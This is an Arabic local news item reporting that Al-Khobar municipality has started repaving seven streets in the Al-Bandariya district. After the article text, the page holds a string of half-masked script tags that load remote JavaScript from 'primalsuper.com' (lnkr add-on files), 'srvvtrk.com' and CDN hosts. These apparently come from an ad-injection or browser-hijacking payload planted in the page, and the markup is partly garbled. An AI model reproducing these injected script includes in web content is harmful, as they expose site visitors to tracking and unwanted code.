شكرا لقرائتكم خبر عن تأهيل وتطوير 7 شوارع في «بندرية» الخبر والان نبدء بالتفاصيل

بدأت بلدية الخبر العمل في إعادة تأهيل وتطوير شوارع حي البندرية ضمن برنامج صيانة الشوارع؛ بهدف تقديم أفضل الخدمات للمواطنين والمقيمين والمحافظة على البنية التحتية بما يتناسب مع تنمية وتطوير المحافظة. وأشار رئيس البلدية م.سلطان الزايدي أنه بدأ كشط 7 شوارع بالحي تمهيدا لسفلتتها وأعمال الدهان والتخطيط لها، مؤكدا استمرار أعمال الصيانة خلال الفترة القادمة بعدد من المواقع والشوارع ضمن جهود البلدية في الارتقاء بمستوى الخدمات المقدمة للسكان، وتطوير الشوارع وجعلها أكثر انسيابية ومرونة وفق أفضل معايير ومواصفات إنشاء البنية التحتية. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_494984247&key=1fd3b038f796d0b159&cv=1549460530&t=1549460530404" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_563947240&key=1fd3b038f796d0b159&cv=10125&t=1549460530404" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460530407" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********



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